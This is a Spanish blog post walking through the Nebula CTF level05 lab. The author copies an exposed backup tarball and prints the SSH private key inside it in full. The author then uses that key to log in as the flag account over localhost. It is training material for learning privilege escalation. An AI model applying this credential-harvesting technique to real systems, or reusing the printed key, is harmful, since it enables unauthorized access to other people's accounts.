Pages

viernes, 20 de julio de 2018

Nebula CTF - level05

Quinto nivel y avanzando: 

level05@nebula:/home/flag05$ ls -al
total 5
drwxr-x--- 4 flag05 level05   93 2012-08-18 06:56 .
drwxr-xr-x 1 root   root     100 2012-08-27 07:18 ..
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .backup
-rw-r--r-- 1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05  3353 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag05 flag05   675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05    70 2011-11-20 20:13 .ssh

Hay dos directorios nuevos, .backup y .ssh. Solo tenemos permisos de acceso para el primero. He aquí un consejo muy habitual "ten cuidado dónde guardas tus copias de seguridad"... 

level05@nebula:/home/flag05$ cd .backup/
level05@nebula:/home/flag05/.backup$ ls -al
total 2
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .
drwxr-x--- 4 flag05 level05   93 2012-08-18 06:56 ..
-rw-rw-r-- 1 flag05 flag05  1826 2011-11-20 20:13 backup-19072011.tgz

¿Qué será? ¿qué será? 

level05@nebula:/home/flag05/.backup$ cp backup-19072011.tgz /tmp
level05@nebula:/home/flag05/.backup$ cd /tmp
level05@nebula:/tmp$ tar -xvzf backup-19072011.tgz 
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
level05@nebula:/tmp$ cd .ssh
level05@nebula:/tmp/.ssh$ ls -al
total 12
drwxr-xr-x 2 level05 level05  100 2011-07-19 02:37 .
drwxrwxrwt 5 root    root     160 2018-07-20 04:16 ..
-rw-r--r-- 1 level05 level05  394 2011-07-19 02:37 authorized_keys
-rw------- 1 level05 level05 1675 2011-07-19 02:37 id_rsa
-rw-r--r-- 1 level05 level05  394 2011-07-19 02:37 id_rsa.pub

OMG! WTF! 

level05@nebula:/tmp/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAywCDXFL7nGpgxuT8y8ZYyzif565M6LexECfaRFl6ECQtP2Vp
vns4RR0HeVFpZMD2dhQQ76sXXK4Jph0/xVRgYytF1hsCJLiedJ3+aWyRMYtkgvZD
TDDD9lYGPzsb3FLqBocxCEpYJLruISY1YdzXpYgIBEVc8Sgq8Ur1uPMHAMYOL+b3
Hga2upWO7vBU9g91SLB6IMyje+2doO5NqmPNgNLzqsPNnv4eiFy46WMAbq9K5tP7
txhQdRxYZwMbhnJ+CLJ0EgXUAgdkvnjlGeD5okP61Eh7lbzHiws68SkflBvcw8KA
sMF6TSXoQECRgoi9ycwTZy4xWspUqij+sY+3EQIDAQABAoIBAAGir2w+/ufzs3Pm
xGKf5nc8rY0gSl5VnIeUyp1iWylmITcxifiO5ZUo9rZzgXXeWB37a2eC6V1Fya4c
7jaYx24FGzruXMYO9rfZzgLrbQAJL3YepcwnWGzTpJk90Kulv1zuGecHMk6ZcvGx
bRysutAKmIXwSR9oQ3BOOkyTKKtI6YeKSnUNU1KVO1t//ps2wFcfXRFb17prpokx
5clWwfUYRLBQlB4XjBIJ3tswpyC0PNOFfzoF+VeUlN9XZFrL0JWHX1F9DDOFJYL5
bXw7zwhjEvZ0/qOvZSJiH4lkbmANsBeMNY/JOGV6T7dWthKBGehCnupeADZVaSeo
Qlysa0ECgYEA6x4FwgpeqNtNGeCcSAUtoviTYMD5LfMEpY8t9eGdRpzw1CDlmG9x
k1LgzE3eA0qlJYx5NNqYEefIPVLdmSuSGS/5KqHeB8Ph7+WqLmguwIIIrfRJoPaD
ON2XqLU6YzAEazTrXnqALjOvP3qdN57xK0zoBAfYlkXJRgMYE1S23YsCgYEA3QhF
Fl11csPc2Yyz/7+9MG9JnOckYvuir+bf3fj/HEuIC9ylwXd4GfSLAW02Sg8DlfRh
M7MxCW9OEWtKgUtHe3fGc6/6X1yF7QfeAYZm8UX/fo6PxuX++mvfPxM4i6vRjgzB
Qy8WisqTK9nLZO+hEdPoVqalz0iUsvu2umz0CVMCgYAsNoUWrCSI1FR3XUmGMZMX
Zm8wbpltDpn9GCOobTjKIpEXEuiZ9bsB3T/wq2Poco0DtprEWabnFxMMlRyexRbA
LclJPw8lnqxKFIIgH+9KvCktrRZ7cl/SvbjbPNkx9cGe92Cbb6XTCl0WLtSJtRXc
8qVevKr59z2WMNbCK9gHaQKBgQDRaQNjpBohKFX2OytSU8uftuBMamV77iJ9e0SA
Hmc83IbBjkPwnwrHtHt6V4lG8yCXktgAznXYFX8mW7tT8gmAfcMkWgbhEFzGbFy2
nyqqzoG42sJ3U/KWOVtifAhns9qvNYBo8ZTu2+xBcHAWaj31EQqgBfU0BPT0+ixu
RcmThwKBgAi0ej7ylHhtwODQGghRmDpxEx9deJ0jilM2EnqIecJj5jnPW8BKDgV4
Dc1QljBeCQ1r30DGYmOIazbhm+orm4df6HWPayRhNBlkmulqTs5GHvLMPjcKMB0k
0Xna7QOtBAnzoHpLcrfvBdfRNE1eC87YkPUhmm5hBgG0+TeMmWgr
-----END RSA PRIVATE KEY-----

La clave privada que nos permite conectarnos a través de SSH al servidor: 

level05@nebula:/tmp/.ssh$ ssh flag05@localhost -i id_rsa
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is ea:8d:09:1d:f1:69:e6:1e:55:c7:ec:e9:76:a1:37:f0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
  
      _   __     __          __     
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ / 
  /_/ |_/\___/_.___/\__,_/_/\__,_/  
                                    
    exploit-exercises.com/nebula


For level descriptions, please see the above URL.

To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.

Currently there are 20 levels (00 - 19).


Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)

 * Documentation:  https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

flag05@nebula:~$ getflag
You have successfully executed getflag on a target account

Pwned!

Nota: Si los permisos de la clave privada son demasiado liberales, ssh rechazará el fichero. Normalmente un oportuno chmod es más que suficiente.
en
Etiquetas: , , , , ,

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)

Protostar CTF - stack5

En ./stack5 continuamos con la dinámica de los dos últimos retos: dpc@kernelinside:~/protostar/bin$ ./stack5 test dpc@kernelinside:~/p...

  • Protostar CTF - stack5
    En ./stack5 continuamos con la dinámica de los dos últimos retos: dpc@kernelinside:~/protostar/bin$ ./stack5 test dpc@kernelinside:~/p...
  • Protostar CTF - stack4
    El binario ./stack4 , al igual que ./stack3 , se muestra muy tímido ante nuestra llegada: dpc@kernelinside:~/protostar/bin$ ./stack4 te...
  • Protostar CTF - stack3
    Como de costumbre comenzamos ejecutando el binario vulnerable en busca de alguna pista en su comportamiento: dpc@kernelinside:~/protost...